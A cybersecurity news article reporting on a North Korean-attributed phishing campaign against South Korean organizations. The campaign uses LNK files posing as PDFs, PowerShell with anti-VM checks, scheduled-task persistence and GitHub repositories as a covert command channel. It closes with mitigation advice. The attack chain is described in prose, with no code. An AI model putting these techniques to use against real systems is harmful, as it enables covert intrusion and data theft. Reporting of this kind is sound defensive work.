A recent cyber campaign attributed to North Korean state-sponsored groups is leveraging Windows LNK files to execute targeted phishing attacks on organizations in South Korea. This campaign notably utilizes GitHub, a trusted internet platform, as a covert Command and Control (C2) channel, enhancing its stealth and effectiveness.
GitHub as an Unlikely C2 Channel
Using GitHub for malicious purposes is particularly concerning due to its widespread trust and acceptance in corporate environments. The campaign’s traffic seamlessly blends with legitimate web activities, bypassing many security measures. This operation, active since at least 2024, has evolved in sophistication, with initial versions of LNK files being less obfuscated and linked to XenoRAT malware distribution.
Recent developments in the campaign include embedding decoding functions within the LNK file arguments and concealing encoded payloads within the files themselves. Attackers employ decoy PDF documents to give users the impression of legitimate file activity while executing malicious scripts in the background.
Targeted Attacks on South Korean Organizations
FortiGuard Labs, under analyst Cara Lin, has identified this campaign, noting that the decoy PDF titles indicate a focus on specific South Korean companies, hinting at a broader surveillance effort. The metadata patterns, such as the “Hangul Document” naming convention, align with techniques used by North Korean groups like Kimsuky, APT37, and Lazarus.
This campaign is classified as high severity because the compromised data can facilitate subsequent attacks. The attackers craft documents around pertinent topics in Korean business, such as financial proposals and strategic partnerships, to enhance their credibility.
Long-Term Surveillance and Data Collection
The operation’s objective appears to be sustained surveillance and intelligence gathering. By using scheduled tasks that activate every 30 minutes and private GitHub repositories for storing stolen data, the attackers maintain an ongoing presence in compromised systems unnoticed.
The attack initiates with the opening of what seems like a regular PDF document, which is actually an LNK file triggering a PowerShell script. This script, upon confirming the absence of virtual machines and forensic tools, sets up a persistent scheduled task and collects system information for upload to the attacker’s GitHub repository.
Mitigation and Security Recommendations
Organizations and users should be wary of unsolicited LNK and PDF files, regardless of their appearance. Monitoring for unusual PowerShell or VBScript activities and investigating unexpected GitHub API endpoint connections are crucial steps in mitigating these threats.
Stay informed by following us on Google News, LinkedIn, and X, and consider setting CSN as a preferred source in Google for timely updates.
